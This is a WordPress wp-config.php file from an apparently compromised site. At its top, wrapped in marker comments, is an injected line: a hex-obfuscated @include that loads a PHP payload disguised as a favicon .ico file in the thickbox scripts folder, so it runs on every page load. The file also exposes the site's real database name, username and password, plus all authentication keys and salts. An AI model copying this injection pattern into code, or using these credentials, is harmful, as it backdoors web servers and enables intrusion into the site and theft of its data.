<?php
/*74efe*/

@include "\x2fhom\x65/co\x6cegi\x345/p\x75bli\x63_ht\x6dl/w\x70-in\x63lud\x65s/j\x73/th\x69ckb\x6fx/f\x61vic\x6fn_1\x61fcd\x31.ic\x6f";

/*74efe*/
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'colegi45_colegio');

/** MySQL database username */
define('DB_USER', 'colegi45_admin');

/** MySQL database password */
define('DB_PASSWORD', 'nadia225640');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'fy1m0xbsdht1qfywyxvo6nxwxvtwjb2fhbcyr7kpag9vlxopz3ilcntmodmrdua1');
define('SECURE_AUTH_KEY',  'sxkcbbw2hn8m70l6joagwkpaenextm0lugwlopdjjjmb8car46awjwjwcxibypkg');
define('LOGGED_IN_KEY',    'osnzkrsoygbe0mofe4k7dfma3omrjuv7d5lzvbns7ocz3hzxekm85no3fdvcbcnz');
define('NONCE_KEY',        'han9gumfbgmayvxanzgpgwhwp6xuqchl5egk2efw2jxu8mesto3vh0865tqjkpwp');
define('AUTH_SALT',        's9thl1sk92khtfe5a2mpjrytjrjfbmrr7jassz8bsntxtmvxkowipjwmrbmd7x4h');
define('SECURE_AUTH_SALT', 'bw0qhgakhjxxvfgsve48k4x98uxgfciyirdwfabdygzhfdijatw7bdszmcopjyuv');
define('LOGGED_IN_SALT',   'sohoxtnw08vrv0kuvw78d9bksnvystlhf5dmrakhntyjaoulfdk0g32tc6ezqrna');
define('NONCE_SALT',       '0kalbqieahc5o9tqh9s06eunmtdca8diw9jsthplzib2mmahxagfwo0nbzkbdkxa');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wplh_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
